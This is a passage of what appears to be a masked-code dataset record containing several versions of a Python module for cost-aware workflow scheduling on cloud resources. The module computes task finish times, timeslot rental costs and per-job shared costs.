prev_cost_job[j] = 0\n else:\n prev_cost_job[j] = float(prev_cost_resource) * sum_w[j\n ] / sum_w_all_old\n if est == -1:\n return prev_cost_job\n new_cost_resource = self.resource_cost(resource_id, start_time=est,\n eft=eft)\n if job_id not in sum_w:\n sum_w[job_id] = 0\n sum_w[job_id] += eft - est\n sum_w_all_new = sum_w_all_old + eft - est\n new_cost_job = {}\n changes = {}\n for j in sum_w.keys():\n if sum_w_all_new == 0:\n new_cost_job[j] = 0\n else:\n new_cost_job[j] = float(new_cost_resource) * sum_w[j\n ] / sum_w_all_new\n if j not in prev_cost_job:\n changes[j] = new_cost_job[j]\n else:\n changes[j] = new_cost_job[j] - prev_cost_job[j]\n if only_this_job:\n return changes[job_id]\n return changes\n",
"step-2": "<mask token>\n\n\nclass Resources(object):\n <mask token>\n <mask token>\n\n def __init__(self, powers, bandwidth):\n number_of_resources = len(powers)\n self.power = powers\n self.tasksOfResource = []\n for i in range(number_of_resources):\n self.tasksOfResource.append([])\n self.len = number_of_resources\n self.bandwidth = bandwidth\n self.job_task_schedule = {}\n <mask token>\n\n def calculate_eft(self, task, resource_id, arrival_time=0):\n g = task.graph\n if resource_id == -1:\n graphs_task_on_resource = []\n task_runtime_on_resource = task.weight / max(self.power)\n else:\n task_runtime_on_resource = task.weight / self.power[resource_id]\n graphs_task_on_resource = list(map(lambda t: t.task.id if t.\n task.graph.name == g.name else -1, self.tasksOfResource[\n resource_id]))\n max_est_of_task = arrival_time\n for p in task.predecessor:\n if p in graphs_task_on_resource:\n communication_delay = 0\n else:\n communication_delay = task.predecessor[p] / self.bandwidth\n if (g.name not in self.job_task_schedule or p not in self.\n job_task_schedule[g.name]):\n continue\n p_eft = self.job_task_schedule[g.name][p].EFT\n if p_eft + communication_delay > max_est_of_task:\n max_est_of_task = p_eft + communication_delay\n start_time, place_id = self.find_gap(resource_id, max_est_of_task,\n task_runtime_on_resource)\n eft_task = start_time + task_runtime_on_resource\n return start_time, eft_task, task_runtime_on_resource, place_id\n <mask token>\n\n def show_schedule(self, job_id=-1, finishing=None, print_enabled=False):\n result = []\n for r in range(0, self.len):\n names = []\n est = []\n eft = []\n\n def add_entries(x):\n if job_id != -1 and x.task.graph.name != job_id:\n return\n names.append(x.task.id if job_id != -1 else\n f'{x.task.graph.name}-{x.task.id}')\n est.append(x.EST)\n eft.append(x.EFT)\n list(map(add_entries, self.tasksOfResource[r]))\n result.append((names, est, eft))\n\n def print_list(x):\n if not print_enabled:\n return\n first = True\n for e in x:\n if first:\n first = False\n else:\n print(',', end=' ')\n print(e, end=' ')\n print()\n print_list(names)\n print_list(est)\n print_list(eft)\n if finishing is not None and print_enabled:\n print(finishing)\n return result\n <mask token>\n\n @property\n def average_power(self):\n return math.fsum(self.power) / self.len\n\n @property\n def makespan(self):\n eft = 0\n for i in range(0, self.len):\n tasks_in_resource = self.tasksOfResource[i]\n if len(tasks_in_resource) == 0:\n continue\n eft = max(eft, tasks_in_resource[-1].EFT)\n return eft\n <mask token>\n\n @property\n def sum_internal_gaps(self):\n sum_gaps = 0\n for r in range(0, self.len):\n sum_gaps += self.sum_gaps_resource(r)\n return sum_gaps\n\n def select_resource(self, task, arrival_time=0):\n (est_best, eft_best, runtime_on_resource_best, place_id_best,\n resource_id_best) = -1, -1, -1, -1, -1\n for r in range(0, self.len):\n (max_est_of_task, eft_task, task_runtime_on_resource, place_id\n ) = self.calculate_eft(task, r, arrival_time=arrival_time)\n if eft_best == -1 or eft_task < eft_best:\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best) = (max_est_of_task,\n eft_task, task_runtime_on_resource, place_id, r)\n return (est_best, runtime_on_resource_best, eft_best,\n resource_id_best, place_id_best)\n\n def get_fastest_empty_resource(self):\n for r in range(self.len - 1, -1, -1):\n if len(self.tasksOfResource[r]) == 0:\n return r\n else:\n return -1\n\n\nclass CostAwareResources(Resources):\n\n def __init__(self, powers, prices, timeslot_len, bandwidth):\n super(CostAwareResources, self).__init__(powers, bandwidth)\n self.timeslot = timeslot_len\n self.price = prices\n self.head_nodes = {}\n self.sum_weight_scheduled = {}\n\n def resource_cost(self, resource_id, start_time=-1, eft=-1, cost_only=True\n ):\n \"\"\"\n computes a resource's cost. if cost_only==True, only returns cost, otherwise it returns also start and finish-times.\n :param resource_id:\n :param start_time:\n :param eft:\n :param cost_only:\n :return:\n \"\"\"\n tasks_in_resource = [t for t in self.tasksOfResource[resource_id] if\n not t.task.dummy_task]\n if not tasks_in_resource:\n if eft == -1:\n return 0 if cost_only else (0, 0, 0)\n else:\n return math.ceil((eft - start_time) / self.timeslot[\n resource_id]) * self.price[resource_id]\n if start_time != -1:\n task_start_time = min(tasks_in_resource[0].EST, start_time)\n else:\n task_start_time = tasks_in_resource[0].EST\n task_finish_time = max(tasks_in_resource[-1].EFT, eft)\n reservation = task_finish_time - task_start_time\n cost = math.ceil(reservation / self.timeslot[resource_id]\n ) * self.price[resource_id]\n timeslot = self.timeslot[resource_id]\n startof = [x.EST for x in tasks_in_resource]\n endof = [x.EFT for x in tasks_in_resource]\n if start_time != -1:\n startof.append(start_time)\n endof.append(eft)\n startof.sort()\n endof.sort()\n timeslot_start = min(startof)\n last_finish_time = max(endof)\n current_task_id = 0\n rent_periods = []\n while timeslot_start < last_finish_time:\n task_len = endof[current_task_id] - timeslot_start\n time_slot_finish = endof[current_task_id] + (timeslot - \n task_len % timeslot) % timeslot\n current_task_id += 1\n if current_task_id >= len(startof):\n rent_periods.append((timeslot_start, time_slot_finish))\n break\n if startof[current_task_id] <= time_slot_finish:\n pass\n else:\n rent_periods.append((timeslot_start, time_slot_finish))\n timeslot_start = startof[current_task_id]\n sum = 0\n for rp in rent_periods:\n sum += rp[1] - rp[0]\n cost = sum / timeslot * self.price[resource_id]\n if cost_only:\n return cost\n else:\n return cost, min(startof), max(endof)\n\n def resource_start_time(self, resource_id):\n tasks_in_resource = self.tasksOfResource[resource_id]\n length = len(tasks_in_resource)\n start_index = 0\n while length > 0 and tasks_in_resource[start_index].task.dummy_task:\n start_index += 1\n length -= 1\n if length == 0:\n return -1\n return tasks_in_resource[start_index].EST\n\n @property\n def plan_cost(self):\n cost = 0\n for i in range(0, self.len):\n cost += self.resource_cost(i)\n return cost\n\n def calculate_shared_cost_within_timeslot(self, timeslot_start, est, ft,\n resource_id, task_id=None):\n timeslot_end = timeslot_start + self.timeslot[resource_id]\n if ft <= timeslot_start or est >= timeslot_end:\n return 0\n tasks = self.tasksOfResource[resource_id]\n task_ids = self.task_id_in_timeslot(resource_id, timeslot_start)\n sum_w = 0\n for id in task_ids:\n if task_id == id:\n continue\n start_time = tasks[id].EST\n finish_time = tasks[id].EFT\n if start_time < timeslot_start:\n start_time = timeslot_start\n if finish_time > timeslot_end:\n finish_time = timeslot_end\n sum_w += finish_time - start_time\n if est < timeslot_start:\n est = timeslot_start\n if ft > timeslot_end:\n ft = timeslot_end\n if ft == est:\n return 0\n share = float(ft - est) / (sum_w + ft - est)\n return share * self.price[resource_id]\n\n def task_id_in_timeslot(self, resource_id, timeslot_start):\n timeslot_end = timeslot_start + self.timeslot[resource_id]\n task_ids = []\n for id in range(len(self.tasksOfResource[resource_id])):\n s = self.tasksOfResource[resource_id][id]\n if (timeslot_start <= s.EST <= timeslot_end or timeslot_start <=\n s.EFT <= timeslot_end or s.EST < timeslot_start and \n timeslot_end < s.EFT):\n task_ids.append(id)\n return task_ids\n\n def calculate_task_shared_cost(self, est=-1, ft=-1, resource_id=-1,\n task_id=None):\n if task_id is not None:\n est = self.tasksOfResource[resource_id][task_id].EST\n ft = self.tasksOfResource[resource_id][task_id].EFT\n timeslot_len = self.timeslot[resource_id]\n resource_start_time = self.resource_start_time(resource_id)\n if resource_start_time == -1:\n resource_start_time = est\n timeslot_start = float(timeslot_len) * math.floor((est -\n resource_start_time) / timeslot_len) + resource_start_time\n timeslot_end = float(timeslot_len) * math.ceil((ft -\n resource_start_time) / timeslot_len) + resource_start_time\n shared_cost = 0\n for interval in f_range(timeslot_start, timeslot_end + timeslot_len /\n 2, timeslot_len):\n share_in_interval = self.calculate_shared_cost_within_timeslot(\n interval, est, ft, resource_id, task_id)\n shared_cost += share_in_interval\n return shared_cost\n\n def calculate_eft_and_cost(self, task, resource_id, arrival_time=0):\n \"\"\"\n calculates eft and cost of a certain task on a certain resource.\n :param task:Definitions.Task()\n :param resource_id:\n :return:\n \"\"\"\n start_time, eft, runtime_on_resource, place_id = self.calculate_eft(\n task, resource_id, arrival_time=arrival_time)\n if task.dummy_task:\n return start_time, eft, runtime_on_resource, place_id, 0\n else:\n cost = self.calculate_share_cost_change(resource_id, start_time,\n eft, task.graph.name, True)\n return start_time, eft, runtime_on_resource, place_id, cost\n\n def sum_external_gaps_resource(self, r):\n c, s, e = self.resource_cost(r, cost_only=False)\n reservation = e - s\n timeslot = self.timeslot[r]\n gap = timeslot - reservation % timeslot\n if gap == timeslot:\n return 0\n else:\n return gap\n\n @property\n def sum_external_gaps(self):\n sum_gaps = 0\n for r in range(0, self.len):\n sum_gaps += self.sum_external_gaps_resource(r)\n return sum_gaps\n\n @property\n def sum_gaps(self):\n return self.sum_internal_gaps + self.sum_external_gaps\n\n @property\n def occupied_resources(self):\n counter = 0\n for i in range(self.len):\n if self.resource_cost(i) != 0:\n counter += self.price[i]\n return counter\n\n @property\n def gap_rate(self):\n return self.sum_gaps / self.makespan / self.occupied_resources\n\n def select_resource(self, task=Task(), test=None, arrival_time=0):\n eft_best = -1\n\n def something_found():\n return eft_best != -1\n if task.asap is not None:\n if not task.asap:\n if not test:\n print('', end='')\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best\n ) = -1, -1, -1, -1, -1, -1\n for r in range(0, self.len):\n (start_time, eft, runtime_on_resource, place_id, cost) = (\n self.calculate_eft_and_cost(task, r, arrival_time=\n arrival_time))\n if (not something_found() or eft < eft_best and task.\n sub_deadline < eft_best or task.sub_budget <\n cost_best and eft <= task.sub_deadline and cost <\n cost_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and (eft_best > task.sub_deadline or\n cost_best > task.sub_budget) or eft <= task.\n sub_deadline and cost <= task.sub_budget and eft <\n eft_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and eft == eft_best and cost <\n cost_best):\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best) = (\n start_time, eft, runtime_on_resource, place_id,\n r, cost)\n continue\n if not test:\n print('', end='')\n return (est_best, runtime_on_resource_best, eft_best,\n resource_id_best, place_id_best, cost_best)\n elif task.asap:\n if not test:\n print('', end='')\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best\n ) = -1, -1, -1, -1, -1, -1\n for r in range(0, self.len):\n (start_time, eft, runtime_on_resource, place_id, cost) = (\n self.calculate_eft_and_cost(task, r, arrival_time=\n arrival_time))\n if (not something_found() or eft < eft_best and task.\n sub_deadline < eft_best or task.sub_budget <\n cost_best and eft <= task.sub_deadline and cost <\n cost_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and (eft_best > task.sub_deadline or\n cost_best > task.sub_budget) or eft <= task.\n sub_deadline and cost <= task.sub_budget and cost <\n cost_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and cost == cost_best and eft <\n eft_best):\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best) = (\n start_time, eft, runtime_on_resource, place_id,\n r, cost)\n continue\n if not test:\n print('', end='')\n return (est_best, runtime_on_resource_best, eft_best,\n resource_id_best, place_id_best, cost_best)\n else:\n return super(CostAwareResources, self).select_resource(task)\n\n def price_of_each_graph(self):\n graph_names = self.job_task_schedule.keys()\n costs = {}\n for name in graph_names:\n costs[name] = 0\n for r in range(self.len):\n for id in range(len(self.tasksOfResource[r])):\n name = self.tasksOfResource[r][id].task.graph.name\n cost = self.calculate_task_shared_cost(resource_id=r,\n task_id=id)\n costs[name] += cost\n return costs\n\n def get_cheapest_empty_resource(self):\n for r in range(self.len):\n if len(self.tasksOfResource[r]) == 0:\n return r\n else:\n return -1\n\n def schedule(self, task_schedule, place_id=-1, do_head_nodes=False):\n super(CostAwareResources, self).schedule(task_schedule, place_id)\n if not do_head_nodes:\n return\n if task_schedule.task.graph.name in self.head_nodes:\n prev_heads = self.head_nodes[task_schedule.task.graph.name]\n parents_of_current_task = task_schedule.task.predecessor.keys()\n self.head_nodes[task_schedule.task.graph.name] = self.head_nodes[\n task_schedule.task.graph.name].difference(\n parents_of_current_task)\n self.head_nodes[task_schedule.task.graph.name].add(task_schedule\n .task.id)\n else:\n self.head_nodes[task_schedule.task.graph.name] = set()\n self.head_nodes[task_schedule.task.graph.name].add(task_schedule\n .task.id)\n self.sum_weight_scheduled[task_schedule.task.graph.name] = 0\n self.sum_weight_scheduled[task_schedule.task.graph.name\n ] += task_schedule.task.weight\n\n def calculate_share_cost_change(self, resource_id, est=-1, eft=-1,\n job_id=-1, only_this_job=False):\n sum_w = {}\n for i in range(len(self.tasksOfResource[resource_id])):\n sch = self.tasksOfResource[resource_id][i]\n job = sch.task.graph.name\n if job not in sum_w:\n sum_w[job] = 0\n sum_w[job] += sch.EFT - sch.EST\n sum_w_all_old = sum(sum_w.values())\n prev_cost_resource = self.resource_cost(resource_id)\n prev_cost_job = {}\n for j in sum_w.keys():\n if sum_w_all_old == 0:\n prev_cost_job[j] = 0\n else:\n prev_cost_job[j] = float(prev_cost_resource) * sum_w[j\n ] / sum_w_all_old\n if est == -1:\n return prev_cost_job\n new_cost_resource = self.resource_cost(resource_id, start_time=est,\n eft=eft)\n if job_id not in sum_w:\n sum_w[job_id] = 0\n sum_w[job_id] += eft - est\n sum_w_all_new = sum_w_all_old + eft - est\n new_cost_job = {}\n changes = {}\n for j in sum_w.keys():\n if sum_w_all_new == 0:\n new_cost_job[j] = 0\n else:\n new_cost_job[j] = float(new_cost_resource) * sum_w[j\n ] / sum_w_all_new\n if j not in prev_cost_job:\n changes[j] = new_cost_job[j]\n else:\n changes[j] = new_cost_job[j] - prev_cost_job[j]\n if only_this_job:\n return changes[job_id]\n return changes\n",
"step-3": "<mask token>\n\n\nclass Resources(object):\n <mask token>\n <mask token>\n\n def __init__(self, powers, bandwidth):\n number_of_resources = len(powers)\n self.power = powers\n self.tasksOfResource = []\n for i in range(number_of_resources):\n self.tasksOfResource.append([])\n self.len = number_of_resources\n self.bandwidth = bandwidth\n self.job_task_schedule = {}\n\n def find_gap(self, resource, start_time, runtime):\n \"\"\"\n finds a gap in resource and returns the start time and the place index of the task among the current tasks of the resource\n if resource is -1, it does nothing (returns the given start time, and -1 for place)\n \"\"\"\n if resource == -1:\n return start_time, -1\n number_of_tasks = len(self.tasksOfResource[resource])\n if number_of_tasks == 0:\n return start_time, 0\n elif self.tasksOfResource[resource][0].EST >= start_time + runtime:\n return start_time, 0\n elif number_of_tasks == 1:\n if self.tasksOfResource[resource][0].EFT < start_time:\n return start_time, 1\n else:\n return self.tasksOfResource[resource][0].EFT, 1\n else:\n for i in range(1, number_of_tasks):\n if self.tasksOfResource[resource][i].EST <= start_time:\n continue\n elif start_time < self.tasksOfResource[resource][i - 1].EFT:\n gap = self.tasksOfResource[resource][i\n ].EST - self.tasksOfResource[resource][i - 1].EFT\n if gap < runtime:\n continue\n else:\n return self.tasksOfResource[resource][i - 1].EFT, i\n elif self.tasksOfResource[resource][i - 1\n ].EFT <= start_time < self.tasksOfResource[resource][i\n ].EST:\n if self.tasksOfResource[resource][i\n ].EST - start_time < runtime:\n continue\n else:\n return start_time, i\n else:\n return max(self.tasksOfResource[resource][-1].EFT, start_time\n ), -1\n\n def calculate_eft(self, task, resource_id, arrival_time=0):\n g = task.graph\n if resource_id == -1:\n graphs_task_on_resource = []\n task_runtime_on_resource = task.weight / max(self.power)\n else:\n task_runtime_on_resource = task.weight / self.power[resource_id]\n graphs_task_on_resource = list(map(lambda t: t.task.id if t.\n task.graph.name == g.name else -1, self.tasksOfResource[\n resource_id]))\n max_est_of_task = arrival_time\n for p in task.predecessor:\n if p in graphs_task_on_resource:\n communication_delay = 0\n else:\n communication_delay = task.predecessor[p] / self.bandwidth\n if (g.name not in self.job_task_schedule or p not in self.\n job_task_schedule[g.name]):\n continue\n p_eft = self.job_task_schedule[g.name][p].EFT\n if p_eft + communication_delay > max_est_of_task:\n max_est_of_task = p_eft + communication_delay\n start_time, place_id = self.find_gap(resource_id, max_est_of_task,\n task_runtime_on_resource)\n eft_task = start_time + task_runtime_on_resource\n return start_time, eft_task, task_runtime_on_resource, place_id\n\n def schedule(self, task_schedule, place_id=-1):\n \"\"\"\n Schedules a task in a place id. if place_id is -1 the schedule is appended to the last.\n :type task_schedule: TaskSchedule\n :type place_id: int\n \"\"\"\n resource = task_schedule.resource\n if place_id == -1:\n self.tasksOfResource[resource].append(task_schedule)\n else:\n self.tasksOfResource[resource].insert(place_id, task_schedule)\n if task_schedule.task.graph.name in self.job_task_schedule:\n pass\n else:\n self.job_task_schedule[task_schedule.task.graph.name] = {}\n self.job_task_schedule[task_schedule.task.graph.name][task_schedule\n .task.id] = task_schedule\n\n def show_schedule(self, job_id=-1, finishing=None, print_enabled=False):\n result = []\n for r in range(0, self.len):\n names = []\n est = []\n eft = []\n\n def add_entries(x):\n if job_id != -1 and x.task.graph.name != job_id:\n return\n names.append(x.task.id if job_id != -1 else\n f'{x.task.graph.name}-{x.task.id}')\n est.append(x.EST)\n eft.append(x.EFT)\n list(map(add_entries, self.tasksOfResource[r]))\n result.append((names, est, eft))\n\n def print_list(x):\n if not print_enabled:\n return\n first = True\n for e in x:\n if first:\n first = False\n else:\n print(',', end=' ')\n print(e, end=' ')\n print()\n print_list(names)\n print_list(est)\n print_list(eft)\n if finishing is not None and print_enabled:\n print(finishing)\n return result\n\n def write_schedule(self, db_file, test_name='N/A', extra='single',\n policy='', job_count=1):\n w = writer.Writer(db_file)\n w.create_plan()\n w.create_plan_head()\n unique_jobs_id = w.write_plan_head(test_name, policy, job_count)\n\n def add_entries(x):\n (job_name, job_type, task_id, jobs_id, start_time, finish_time,\n resource_id, resource_speed, job_component_id, extra_params\n ) = (x.task.graph.name, x.task.graph.type, x.task.id,\n unique_jobs_id, x.EST, x.EFT, r, self.power[r], policy, extra)\n w.write_plan(job_name, job_type, task_id, jobs_id, start_time,\n finish_time, resource_id, resource_speed, job_component_id,\n extra_params)\n for r in range(0, self.len):\n list(map(add_entries, self.tasksOfResource[r]))\n w.commit()\n w.close()\n\n @property\n def average_power(self):\n return math.fsum(self.power) / self.len\n\n @property\n def makespan(self):\n eft = 0\n for i in range(0, self.len):\n tasks_in_resource = self.tasksOfResource[i]\n if len(tasks_in_resource) == 0:\n continue\n eft = max(eft, tasks_in_resource[-1].EFT)\n return eft\n\n def sum_gaps_resource(self, resource_id):\n tasks_in_current_resource = self.tasksOfResource[resource_id]\n num_tasks = len(tasks_in_current_resource)\n if num_tasks <= 1:\n return 0\n sum_gaps = 0\n for i in range(1, num_tasks):\n if tasks_in_current_resource[i - 1\n ].task.dummy_task or tasks_in_current_resource[i\n ].task.dummy_task:\n continue\n finish_prev = tasks_in_current_resource[i - 1].EFT\n start_current = tasks_in_current_resource[i].EST\n gap_length = start_current - finish_prev\n if gap_length < 0:\n raise Exception('Schedule is not correct, check gaps!')\n sum_gaps += gap_length\n return sum_gaps\n\n @property\n def sum_internal_gaps(self):\n sum_gaps = 0\n for r in range(0, self.len):\n sum_gaps += self.sum_gaps_resource(r)\n return sum_gaps\n\n def select_resource(self, task, arrival_time=0):\n (est_best, eft_best, runtime_on_resource_best, place_id_best,\n resource_id_best) = -1, -1, -1, -1, -1\n for r in range(0, self.len):\n (max_est_of_task, eft_task, task_runtime_on_resource, place_id\n ) = self.calculate_eft(task, r, arrival_time=arrival_time)\n if eft_best == -1 or eft_task < eft_best:\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best) = (max_est_of_task,\n eft_task, task_runtime_on_resource, place_id, r)\n return (est_best, runtime_on_resource_best, eft_best,\n resource_id_best, place_id_best)\n\n def get_fastest_empty_resource(self):\n for r in range(self.len - 1, -1, -1):\n if len(self.tasksOfResource[r]) == 0:\n return r\n else:\n return -1\n\n\nclass CostAwareResources(Resources):\n\n def __init__(self, powers, prices, timeslot_len, bandwidth):\n super(CostAwareResources, self).__init__(powers, bandwidth)\n self.timeslot = timeslot_len\n self.price = prices\n self.head_nodes = {}\n self.sum_weight_scheduled = {}\n\n def resource_cost(self, resource_id, start_time=-1, eft=-1, cost_only=True\n ):\n \"\"\"\n computes a resource's cost. if cost_only==True, only returns cost, otherwise it returns also start and finish-times.\n :param resource_id:\n :param start_time:\n :param eft:\n :param cost_only:\n :return:\n \"\"\"\n tasks_in_resource = [t for t in self.tasksOfResource[resource_id] if\n not t.task.dummy_task]\n if not tasks_in_resource:\n if eft == -1:\n return 0 if cost_only else (0, 0, 0)\n else:\n return math.ceil((eft - start_time) / self.timeslot[\n resource_id]) * self.price[resource_id]\n if start_time != -1:\n task_start_time = min(tasks_in_resource[0].EST, start_time)\n else:\n task_start_time = tasks_in_resource[0].EST\n task_finish_time = max(tasks_in_resource[-1].EFT, eft)\n reservation = task_finish_time - task_start_time\n cost = math.ceil(reservation / self.timeslot[resource_id]\n ) * self.price[resource_id]\n timeslot = self.timeslot[resource_id]\n startof = [x.EST for x in tasks_in_resource]\n endof = [x.EFT for x in tasks_in_resource]\n if start_time != -1:\n startof.append(start_time)\n endof.append(eft)\n startof.sort()\n endof.sort()\n timeslot_start = min(startof)\n last_finish_time = max(endof)\n current_task_id = 0\n rent_periods = []\n while timeslot_start < last_finish_time:\n task_len = endof[current_task_id] - timeslot_start\n time_slot_finish = endof[current_task_id] + (timeslot - \n task_len % timeslot) % timeslot\n current_task_id += 1\n if current_task_id >= len(startof):\n rent_periods.append((timeslot_start, time_slot_finish))\n break\n if startof[current_task_id] <= time_slot_finish:\n pass\n else:\n rent_periods.append((timeslot_start, time_slot_finish))\n timeslot_start = startof[current_task_id]\n sum = 0\n for rp in rent_periods:\n sum += rp[1] - rp[0]\n cost = sum / timeslot * self.price[resource_id]\n if cost_only:\n return cost\n else:\n return cost, min(startof), max(endof)\n\n def resource_start_time(self, resource_id):\n tasks_in_resource = self.tasksOfResource[resource_id]\n length = len(tasks_in_resource)\n start_index = 0\n while length > 0 and tasks_in_resource[start_index].task.dummy_task:\n start_index += 1\n length -= 1\n if length == 0:\n return -1\n return tasks_in_resource[start_index].EST\n\n @property\n def plan_cost(self):\n cost = 0\n for i in range(0, self.len):\n cost += self.resource_cost(i)\n return cost\n\n def calculate_shared_cost_within_timeslot(self, timeslot_start, est, ft,\n resource_id, task_id=None):\n timeslot_end = timeslot_start + self.timeslot[resource_id]\n if ft <= timeslot_start or est >= timeslot_end:\n return 0\n tasks = self.tasksOfResource[resource_id]\n task_ids = self.task_id_in_timeslot(resource_id, timeslot_start)\n sum_w = 0\n for id in task_ids:\n if task_id == id:\n continue\n start_time = tasks[id].EST\n finish_time = tasks[id].EFT\n if start_time < timeslot_start:\n start_time = timeslot_start\n if finish_time > timeslot_end:\n finish_time = timeslot_end\n sum_w += finish_time - start_time\n if est < timeslot_start:\n est = timeslot_start\n if ft > timeslot_end:\n ft = timeslot_end\n if ft == est:\n return 0\n share = float(ft - est) / (sum_w + ft - est)\n return share * self.price[resource_id]\n\n def task_id_in_timeslot(self, resource_id, timeslot_start):\n timeslot_end = timeslot_start + self.timeslot[resource_id]\n task_ids = []\n for id in range(len(self.tasksOfResource[resource_id])):\n s = self.tasksOfResource[resource_id][id]\n if (timeslot_start <= s.EST <= timeslot_end or timeslot_start <=\n s.EFT <= timeslot_end or s.EST < timeslot_start and \n timeslot_end < s.EFT):\n task_ids.append(id)\n return task_ids\n\n def calculate_task_shared_cost(self, est=-1, ft=-1, resource_id=-1,\n task_id=None):\n if task_id is not None:\n est = self.tasksOfResource[resource_id][task_id].EST\n ft = self.tasksOfResource[resource_id][task_id].EFT\n timeslot_len = self.timeslot[resource_id]\n resource_start_time = self.resource_start_time(resource_id)\n if resource_start_time == -1:\n resource_start_time = est\n timeslot_start = float(timeslot_len) * math.floor((est -\n resource_start_time) / timeslot_len) + resource_start_time\n timeslot_end = float(timeslot_len) * math.ceil((ft -\n resource_start_time) / timeslot_len) + resource_start_time\n shared_cost = 0\n for interval in f_range(timeslot_start, timeslot_end + timeslot_len /\n 2, timeslot_len):\n share_in_interval = self.calculate_shared_cost_within_timeslot(\n interval, est, ft, resource_id, task_id)\n shared_cost += share_in_interval\n return shared_cost\n\n def calculate_eft_and_cost(self, task, resource_id, arrival_time=0):\n \"\"\"\n calculates eft and cost of a certain task on a certain resource.\n :param task:Definitions.Task()\n :param resource_id:\n :return:\n \"\"\"\n start_time, eft, runtime_on_resource, place_id = self.calculate_eft(\n task, resource_id, arrival_time=arrival_time)\n if task.dummy_task:\n return start_time, eft, runtime_on_resource, place_id, 0\n else:\n cost = self.calculate_share_cost_change(resource_id, start_time,\n eft, task.graph.name, True)\n return start_time, eft, runtime_on_resource, place_id, cost\n\n def sum_external_gaps_resource(self, r):\n c, s, e = self.resource_cost(r, cost_only=False)\n reservation = e - s\n timeslot = self.timeslot[r]\n gap = timeslot - reservation % timeslot\n if gap == timeslot:\n return 0\n else:\n return gap\n\n @property\n def sum_external_gaps(self):\n sum_gaps = 0\n for r in range(0, self.len):\n sum_gaps += self.sum_external_gaps_resource(r)\n return sum_gaps\n\n @property\n def sum_gaps(self):\n return self.sum_internal_gaps + self.sum_external_gaps\n\n @property\n def occupied_resources(self):\n counter = 0\n for i in range(self.len):\n if self.resource_cost(i) != 0:\n counter += self.price[i]\n return counter\n\n @property\n def gap_rate(self):\n return self.sum_gaps / self.makespan / self.occupied_resources\n\n def select_resource(self, task=Task(), test=None, arrival_time=0):\n eft_best = -1\n\n def something_found():\n return eft_best != -1\n if task.asap is not None:\n if not task.asap:\n if not test:\n print('', end='')\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best\n ) = -1, -1, -1, -1, -1, -1\n for r in range(0, self.len):\n (start_time, eft, runtime_on_resource, place_id, cost) = (\n self.calculate_eft_and_cost(task, r, arrival_time=\n arrival_time))\n if (not something_found() or eft < eft_best and task.\n sub_deadline < eft_best or task.sub_budget <\n cost_best and eft <= task.sub_deadline and cost <\n cost_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and (eft_best > task.sub_deadline or\n cost_best > task.sub_budget) or eft <= task.\n sub_deadline and cost <= task.sub_budget and eft <\n eft_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and eft == eft_best and cost <\n cost_best):\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best) = (\n start_time, eft, runtime_on_resource, place_id,\n r, cost)\n continue\n if not test:\n print('', end='')\n return (est_best, runtime_on_resource_best, eft_best,\n resource_id_best, place_id_best, cost_best)\n elif task.asap:\n if not test:\n print('', end='')\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best\n ) = -1, -1, -1, -1, -1, -1\n for r in range(0, self.len):\n (start_time, eft, runtime_on_resource, place_id, cost) = (\n self.calculate_eft_and_cost(task, r, arrival_time=\n arrival_time))\n if (not something_found() or eft < eft_best and task.\n sub_deadline < eft_best or task.sub_budget <\n cost_best and eft <= task.sub_deadline and cost <\n cost_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and (eft_best > task.sub_deadline or\n cost_best > task.sub_budget) or eft <= task.\n sub_deadline and cost <= task.sub_budget and cost <\n cost_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and cost == cost_best and eft <\n eft_best):\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best) = (\n start_time, eft, runtime_on_resource, place_id,\n r, cost)\n continue\n if not test:\n print('', end='')\n return (est_best, runtime_on_resource_best, eft_best,\n resource_id_best, place_id_best, cost_best)\n else:\n return super(CostAwareResources, self).select_resource(task)\n\n def price_of_each_graph(self):\n graph_names = self.job_task_schedule.keys()\n costs = {}\n for name in graph_names:\n costs[name] = 0\n for r in range(self.len):\n for id in range(len(self.tasksOfResource[r])):\n name = self.tasksOfResource[r][id].task.graph.name\n cost = self.calculate_task_shared_cost(resource_id=r,\n task_id=id)\n costs[name] += cost\n return costs\n\n def get_cheapest_empty_resource(self):\n for r in range(self.len):\n if len(self.tasksOfResource[r]) == 0:\n return r\n else:\n return -1\n\n def schedule(self, task_schedule, place_id=-1, do_head_nodes=False):\n super(CostAwareResources, self).schedule(task_schedule, place_id)\n if not do_head_nodes:\n return\n if task_schedule.task.graph.name in self.head_nodes:\n prev_heads = self.head_nodes[task_schedule.task.graph.name]\n parents_of_current_task = task_schedule.task.predecessor.keys()\n self.head_nodes[task_schedule.task.graph.name] = self.head_nodes[\n task_schedule.task.graph.name].difference(\n parents_of_current_task)\n self.head_nodes[task_schedule.task.graph.name].add(task_schedule\n .task.id)\n else:\n self.head_nodes[task_schedule.task.graph.name] = set()\n self.head_nodes[task_schedule.task.graph.name].add(task_schedule\n .task.id)\n self.sum_weight_scheduled[task_schedule.task.graph.name] = 0\n self.sum_weight_scheduled[task_schedule.task.graph.name\n ] += task_schedule.task.weight\n\n def calculate_share_cost_change(self, resource_id, est=-1, eft=-1,\n job_id=-1, only_this_job=False):\n sum_w = {}\n for i in range(len(self.tasksOfResource[resource_id])):\n sch = self.tasksOfResource[resource_id][i]\n job = sch.task.graph.name\n if job not in sum_w:\n sum_w[job] = 0\n sum_w[job] += sch.EFT - sch.EST\n sum_w_all_old = sum(sum_w.values())\n prev_cost_resource = self.resource_cost(resource_id)\n prev_cost_job = {}\n for j in sum_w.keys():\n if sum_w_all_old == 0:\n 